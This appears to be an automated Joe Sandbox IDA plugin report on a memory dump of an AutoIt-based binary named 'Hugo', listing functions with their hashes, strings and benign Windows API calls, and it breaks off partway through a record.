Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: c544e6c0ec753ad281928c735dcbefaa307c34f59a85b82d403ca19e2a7c3130
Instruction ID: ae3d27d33bc18b4444e753603e3b3315f7fcdc89fd6fcf2f8f900f6cd7a7cb9b
Opcode Fuzzy Hash: c544e6c0ec753ad281928c735dcbefaa307c34f59a85b82d403ca19e2a7c3130
Instruction Fuzzy Hash: 1541FAF2508198BFEF185B2C9C8EBFD3A7DE701320F444125F502891D1DAA99BC8B762

Function 00F490C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cb2be5a4ee160831402dd98be864b69c49876bc4ba6c6899dd5eb6b068fc24a
Instruction ID: 5ae0bb50365931147c335bb9c06a4a8fab4f196882d1c6ed21b82eda2a53dcaf
Opcode Fuzzy Hash: 6cb2be5a4ee160831402dd98be864b69c49876bc4ba6c6899dd5eb6b068fc24a
Instruction Fuzzy Hash: 20C1E571E082499FDF11DFA8DC41BBE7FB4AF4A320F044155E914AB3A2C7B49941EB61

Function 00F2AC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d0b, xrefs: 00F2AC96, 00F2AD10, 00F2AEA7
d1b, xrefs: 00F2AD55, 00F2AE8E
d5m0, xrefs: 00F2AE75
d1r0,2, xrefs: 00F2ACA9
d10m0, xrefs: 00F2ACF0
i, xrefs: 00F2B0A3

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID:
String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
API String ID: 0-4285391669
Opcode ID: b0eed068543d2da60f257844e01731011ba53bb4906ece9f243d3efdf554ef9e
Instruction ID: e5e2c536e37288bf999f8ac0c58f0939627457475ba4bad946cd79ced660f90d
Opcode Fuzzy Hash: b0eed068543d2da60f257844e01731011ba53bb4906ece9f243d3efdf554ef9e
Instruction Fuzzy Hash: 79626AB0508341CFC724CF14C495AAABBE0FF89354F14895EE8998B352DB75D946EF82

Function 00F135B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F135E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F13602
ShowWindow.USER32(00000000,?,?,?,?,?,?,00F13368,?), ref: 00F13616
ShowWindow.USER32(00000000,?,?,?,?,?,?,00F13368,?), ref: 00F1361F

Strings

edit, xrefs: 00F135FC
AutoIt v3, xrefs: 00F135D9, 00F135DE, 00F135DF

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: d115cfb25a64bc24a4671ae9a72a79dadb7392d40d6e47920f2c51e9529d11b5
Instruction ID: 70596fd52d50e81f59816829511fbe29032bacdd6b157bb5a292ab2ff28bab6a
Opcode Fuzzy Hash: d115cfb25a64bc24a4671ae9a72a79dadb7392d40d6e47920f2c51e9529d11b5
Instruction Fuzzy Hash: 43F0B7B16402DC7EE76557176C88E373EBDD7C7F50B00001AB905AA5A0E66A1851FEB0

Function 00F161A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F55287

Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F16299

Strings

AutoIt - , xrefs: 00F1620D
Line %d: , xrefs: 00F55305

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: 5b1af25628901ea80f27dbe3a8ed11a32a838e17078277646a2fc7e5bafa448c
Instruction ID: 4d0ae8fbe656115f5db2d6fe854bf82310030cb74ccd7cac71f6a0fa8c357ff2
Opcode Fuzzy Hash: 5b1af25628901ea80f27dbe3a8ed11a32a838e17078277646a2fc7e5bafa448c
Instruction Fuzzy Hash: 7841B571408344AEC711EB60DC41ADF77ECAF84720F00462EF999920A1EB78D689EB93

Function 00F158CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00F158BE,SwapMouseButtons,00000004,?), ref: 00F158EF
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00F158BE,SwapMouseButtons,00000004,?), ref: 00F15910
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00F158BE,SwapMouseButtons,00000004,?), ref: 00F15932

Strings

Control Panel\Mouse, xrefs: 00F158ED

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 36d63cf16b39015f3736231b5dafc3be3b6502726235ceff54276aec42f90a8c
Instruction ID: b0f3d860f7330d6cad7149c993ca3b6af9c4d9c1afb9e2ab7a8acae370080203
Opcode Fuzzy Hash: 36d63cf16b39015f3736231b5dafc3be3b6502726235ceff54276aec42f90a8c
Instruction Fuzzy Hash: C3115AB6510618FFDB218F64CC80AEEBBBCEF41B60B508419F802E7210E2319E81E761

Function 00F1F6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00F648C6

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 20c615ed951ef0e79168dbc9b52cc7b7cb489330aee51eb5b503d721430c39bd
Instruction ID: fe8b065adc50eb0a8a7b56f8a04d9424697d522cbe3fa9acb862331f1c7d8fa2
Opcode Fuzzy Hash: 20c615ed951ef0e79168dbc9b52cc7b7cb489330aee51eb5b503d721430c39bd
Instruction Fuzzy Hash: 0FC2AD71E00215CFCB24DF58D894BADB7B1FF09320F24816AE905AB391D779AD85EB90

Function 00F20340 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00F215F2

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 582c59f6c30f24a01e3091183ebc5aefea24276d931f939984af09d23ba5513c
Instruction ID: afb71ea591529d9d65564e569048765b210c1454cdf065a944d8acd0fc11eec3
Opcode Fuzzy Hash: 582c59f6c30f24a01e3091183ebc5aefea24276d931f939984af09d23ba5513c
Instruction Fuzzy Hash: 66B29C76A08361CFCB24CF14E890A2AB7E1BF99310F14495DE9858B352DB35ED41EF92

Function 00F3014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00F309D8

Part of subcall function 00F33614: RaiseException.KERNEL32(?,?,?,00F309FA,?,00000000,?,?,?,?,?,?,00F309FA,00000000,00FD9758,00000000), ref: 00F33674

__CxxThrowException@8.LIBVCRUNTIME ref: 00F309F5

Strings

Unknown exception, xrefs: 00F30A02

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: fbaa77ed2aaddf80d05e0a05588435277f4fea3af346cb33ed687b9dd7fdfe3b
Instruction ID: cf1ecd58cca724ccd8ad6bdf360e1571186f0ed5a2fc5488b9b91f5e4d2566cc
Opcode Fuzzy Hash: fbaa77ed2aaddf80d05e0a05588435277f4fea3af346cb33ed687b9dd7fdfe3b
Instruction Fuzzy Hash: 95F04F34D0420DBB8B00BAA8EC66A9E776C5E00770F604162B914966E2EF74EA55B691

Function 00F989B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00F98D52
TerminateProcess.KERNEL32(00000000), ref: 00F98D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00F98F3A

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: aaeddd7091b0847e77eb66c5ddbf208c7707f327af0ef92e23b68ce5aa0389e8
Instruction ID: 5d366b0f660b157cb172905bbb8b298bc016159d14ff30f1921e9dae4f312134
Opcode Fuzzy Hash: aaeddd7091b0847e77eb66c5ddbf208c7707f327af0ef92e23b68ce5aa0389e8
Instruction Fuzzy Hash: BC127E71908301DFDB14DF24C484B6ABBE5FF85368F04895DE8898B252CB35ED46DB92

Function 00F99AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F99B87
_strcat.LIBCMT ref: 00F99BC6
_wcslen.LIBCMT ref: 00F99C14

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _wcslen$_strcat
String ID:
API String ID: 306214811-0
Opcode ID: ce26989580c478ab97baf0689e0483d583e4fb564db4ca74f616f831e57a200e
Instruction ID: 009c19f0ce468ec2629ea9419d22f26f1f085050f3408bc5715f83c43ee68510
Opcode Fuzzy Hash: ce26989580c478ab97baf0689e0483d583e4fb564db4ca74f616f831e57a200e
Instruction Fuzzy Hash: 1FA18B31604105EFDB18DF58C9D19A9BBA1FF45314B6184AEE84A8F692CB35ED42EFC0

Function 00F12793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F132AF
Part of subcall function 00F1327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F132B7
Part of subcall function 00F1327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F132C2
Part of subcall function 00F1327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F132CD
Part of subcall function 00F1327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F132D5
Part of subcall function 00F1327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F132DD

Part of subcall function 00F13205: RegisterWindowMessageW.USER32(00000004,?,00F12964), ref: 00F1325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F12A0A
OleInitialize.OLE32 ref: 00F12A28
CloseHandle.KERNEL32(00000000,00000000), ref: 00F53A0D

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 5374f51943874163b50a915df99c318d4c09cb0900c0ec5e5949d5341e5e6e6a
Instruction ID: d32fd0807af2b663db08739dbfe950db4ae014d4c5fd1fe23b3c93e2f7bdad1e
Opcode Fuzzy Hash: 5374f51943874163b50a915df99c318d4c09cb0900c0ec5e5949d5341e5e6e6a
Instruction Fuzzy Hash: D4717EB191138C8E87C8EF69AEE56553AEDFB49304348412AD009CB2B2FBB44545FF55

Function 00F2FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F161A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F16299

KillTimer.USER32(?,00000001,?,?), ref: 00F2FD36
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F2FD45
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F6FE33

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: a8369e3fe9f163dea10bb2fcdb351c253fcc10fe8a6f381da28a2c57638bd031
Instruction ID: 8dc24eb46352377beb470539dfebd87d531aa64f3f9236e7c78d293fedd53e10
Opcode Fuzzy Hash: a8369e3fe9f163dea10bb2fcdb351c253fcc10fe8a6f381da28a2c57638bd031
Instruction Fuzzy Hash: E9319871D04354AFEB72CF2498557E6BBECAF12314F0004AED5DA97141D3742A89EB51

Function 00F48A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,00F4894C,?,00FD9CE8,0000000C), ref: 00F48A84
GetLastError.KERNEL32(?,00F4894C,?,00FD9CE8,0000000C), ref: 00F48A8E
__dosmaperr.LIBCMT ref: 00F48AB9

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 777f69ee1edccf836698c8c3a25bf2a8a2f7d865fdcb4109bac536d891aa201c
Instruction ID: 2e5e5a8c9cf08616cd206cfa9a0a0c3a6528fb9eeb7e3c29720567c95adc801c
Opcode Fuzzy Hash: 777f69ee1edccf836698c8c3a25bf2a8a2f7d865fdcb4109bac536d891aa201c
Instruction Fuzzy Hash: F1010832E051A47BD6246374AC8677E7F454B82BB4F29012AFC149B1D2DFB88DC2B191

Function 00F4970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00F497BA,FF8BC369,00000000,00000002,00000000), ref: 00F49744
GetLastError.KERNEL32(?,00F497BA,FF8BC369,00000000,00000002,00000000,?,00F45ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00F36F41), ref: 00F4974E
__dosmaperr.LIBCMT ref: 00F49755

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 552a66915518d1318946b9d9e74484ac6b94e4cd77b71db8dc75ddb01d8c211a
Instruction ID: 9220c2dec81f03156cef5898f5b2d9f95efc65bdb8a1d912a2197528f3b7fe9f
Opcode Fuzzy Hash: 552a66915518d1318946b9d9e74484ac6b94e4cd77b71db8dc75ddb01d8c211a
Instruction Fuzzy Hash: 1901D833B24518ABCB159F99DC459AF7F29EB85330B240259FC119B190EA719D41EB90

Function 00F1F238 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 00F1F27B
DispatchMessageW.USER32(?), ref: 00F1F289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1F29F
Sleep.KERNEL32(0000000A), ref: 00F1F2B1
TranslateAcceleratorW.USER32(?,?,?), ref: 00F632D8

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 4c8f76b4e2def877820c68bd2f64dc63f94b1b051054971770b683c78bc7ecc5
Instruction ID: 5294b965b104b5a90f394dc6018bd2facd474cbb93c01fe4443267fccef07e89
Opcode Fuzzy Hash: 4c8f76b4e2def877820c68bd2f64dc63f94b1b051054971770b683c78bc7ecc5
Instruction Fuzzy Hash: E4F089705443889BE774C760DC49FDA33ACEB45310F104519E60AC70C0DB749588FB15

Function 00F22B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00F23006

Strings

CALL, xrefs: 00F22FD6

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 9f7ca084542db15b115cd098b80e043b35bb39b440833b69257304afcad6e29f
Instruction ID: 1bdce75d1d6fd0a672a841f3f83ddcfb23ced2f112790822ddc91b61a3b0ff39
Opcode Fuzzy Hash: 9f7ca084542db15b115cd098b80e043b35bb39b440833b69257304afcad6e29f
Instruction Fuzzy Hash: 0222ABB0A08311AFC754DF24D884B2ABBF1BF84324F14895DF4968B3A1D775E941EB92

Function 00F13A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00F5413B

Part of subcall function 00F15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F155D1,?,?,00F54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F15871

Part of subcall function 00F13A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F13A76

Strings

X, xrefs: 00F54109

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
